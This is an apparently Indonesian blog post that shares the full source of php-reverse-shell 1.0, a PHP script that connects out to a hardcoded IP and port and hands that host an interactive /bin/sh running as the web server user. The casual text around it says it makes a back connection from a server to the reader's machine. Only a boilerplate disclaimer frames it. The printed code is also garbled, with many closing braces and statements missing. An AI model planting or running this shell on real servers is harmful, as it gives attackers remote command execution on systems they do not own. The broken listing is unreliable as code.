php-reverse-shell-1.0 Langsung ke konten utama


ketemu lagi ma aku kekekekke
orang yg sotoy orang yg pelit orang yg menjengkelkan dha pokoknya
pada kesempatan ini cuma mau bagi2 script

nih scriptnya

// php-reverse-shell - A Reverse Shell implementation in PHP
// Copyright (C) 2007
// This tool may be used for legal purposes only. Users take full responsibility
// for any actions performed using this tool. The author accepts no liability
// for damage caused by this tool. If these terms are not acceptable to you, then
// do not use this tool.
// In all other respects the GPL version 2 applies:
// This program is free software; you can redistribute it and/or modify
// it under the terms of the GNU General Public License version 2 as
// published by the Free Software Foundation.
// This program is distributed in the hope that it will be useful,
// but WITHOUT ANY WARRANTY; without even the implied warranty of
// GNU General Public License for more details.
// You should have received a copy of the GNU General Public License along
// with this program; if not, write to the Free Software Foundation, Inc.,
// 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
// This tool may be used for legal purposes only. Users take full responsibility
// for any actions performed using this tool. If these terms are not acceptable to
// you, then do not use this tool.
// You are encouraged to send comments, improvements or suggestions to
// me at
// Description
// -----------
// This script will make an outbound TCP connection to a hardcoded IP and port.
// The recipient will be given a shell running as the current user (apache normally).
// Limitations
// -----------
// proc_open and stream_set_blocking require PHP version 4.3+, or 5+
// Use of stream_select() on file descriptors returned by proc_open() will fail and return FALSE under Windows.
// Some compile-time options are needed for daemonisation (like pcntl, posix). These are rarely available.
// Usage
// -----
// See if you get stuck.

set_time_limit (0);
$VERSION = "1.0";
$ip = ''; // CHANGE THIS
$port = 54445; // CHANGE THIS
$chunk_size = 1400;
$write_a = null;
$error_a = null;
$shell = 'uname -a; w; id; /bin/sh -i';
$daemon = 0;
$debug = 0;

// Daemonise ourself if possible to avoid zombies later

// pcntl_fork is hardly ever available, but will allow us to daemonise
// our php process and avoid zombies. Worth a try...
if (function_exists('pcntl_fork')) {
// Fork and have the parent process exit
$pid = pcntl_fork();

if ($pid == -1) {
printit("ERROR: Can't fork");

if ($pid) {
exit(0); // Parent exits

// Make the current process a session leader
// Will only succeed if we forked
if (posix_setsid() == -1) {
printit("Error: Can't setsid()");

$daemon = 1;
} else {
printit("WARNING: Failed to daemonise. This is quite common and not fatal.");

// Change to a safe directory

// Remove any umask we inherited

// Do the reverse shell...

// Open reverse connection
$sock = fsockopen($ip, $port, $errno, $errstr, 30);
if (!$sock) {
printit("$errstr ($errno)");

// Spawn shell process
$descriptorspec = array(
0 => array("pipe", "r"), // stdin is a pipe that the child will read from
1 => array("pipe", "w"), // stdout is a pipe that the child will write to
2 => array("pipe", "w") // stderr is a pipe that the child will write to

$process = proc_open($shell, $descriptorspec, $pipes);

if (!is_resource($process)) {
printit("ERROR: Can't spawn shell");

// Set everything to non-blocking
// Reason: Occsionally reads will block, even though stream_select tells us they won't
stream_set_blocking($pipes[0], 0);
stream_set_blocking($pipes[1], 0);
stream_set_blocking($pipes[2], 0);
stream_set_blocking($sock, 0);

printit("Successfully opened reverse shell to $ip:$port");

while (1) {
// Check for end of TCP connection
if (feof($sock)) {
printit("ERROR: Shell connection terminated");

// Check for end of STDOUT
if (feof($pipes[1])) {
printit("ERROR: Shell process terminated");

// Wait until a command is end down $sock, or some
// command output is available on STDOUT or STDERR
$read_a = array($sock, $pipes[1], $pipes[2]);
$num_changed_sockets = stream_select($read_a, $write_a, $error_a, null);

// If we can read from the TCP socket, send
// data to process's STDIN
if (in_array($sock, $read_a)) {
if ($debug) printit("SOCK READ");
$input = fread($sock, $chunk_size);
if ($debug) printit("SOCK: $input");
fwrite($pipes[0], $input);

// If we can read from the process's STDOUT
// send data down tcp connection
if (in_array($pipes[1], $read_a)) {
if ($debug) printit("STDOUT READ");
$input = fread($pipes[1], $chunk_size);
if ($debug) printit("STDOUT: $input");
fwrite($sock, $input);

// If we can read from the process's STDERR
// send data down tcp connection
if (in_array($pipes[2], $read_a)) {
if ($debug) printit("STDERR READ");
$input = fread($pipes[2], $chunk_size);
if ($debug) printit("STDERR: $input");
fwrite($sock, $input);


// Like print, but does nothing if we've daemonised ourself
// (I can't figure out how to redirect STDOUT like a proper daemon)
function printit ($string) {
if (!$daemon) {
print "$string\n";


ini fungsinya untuk membuat back connect antara server dengan kompie kita ato dengan server laen
moga berguna
wassalam thenk's


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